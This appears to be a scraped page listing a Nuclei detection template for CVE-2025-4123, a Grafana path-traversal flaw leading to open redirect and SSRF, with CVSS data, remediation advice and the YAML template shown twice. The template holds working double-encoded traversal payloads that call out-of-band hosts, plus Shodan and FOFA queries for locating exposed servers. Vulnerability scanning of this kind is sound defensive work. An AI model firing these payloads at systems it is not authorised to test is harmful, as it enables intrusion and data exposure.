Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

CVE-2025-4123

Verified

Description

An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.

Severity

High

CVSS Score

7.6

Exploit Probability

Published Date

May 22, 2025

Template Author

iamnoooob, rootxharsh, pdresearch

CVE-2025-4123.yaml

id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  impact: |
    Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
  remediation: |
    Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.08371
    epss-percentile: 0.91989
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4b0a00483046022100e0b4bd6ae2abb6c3fa15809cc809b9e6224080517840ee6ae75e0b9137e95155022100e0fe62efaeb26bd80201786ec509f2ceae4e0bb1b2aa145e4ee0d2f3f3d8384d:922c64590222798bb761d5b6d8e72950

7.6Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

CVE ID:

cve-2025-4123

CWE ID:

cwe-79, cwe-601

References

https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53 https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/

Remediation Steps

Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.

id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  impact: |
    Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
  remediation: |
    Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.08371
    epss-percentile: 0.91989
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4b0a00483046022100e0b4bd6ae2abb6c3fa15809cc809b9e6224080517840ee6ae75e0b9137e95155022100e0fe62efaeb26bd80201786ec509f2ceae4e0bb1b2aa145e4ee0d2f3f3d8384d:922c64590222798bb761d5b6d8e72950

Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps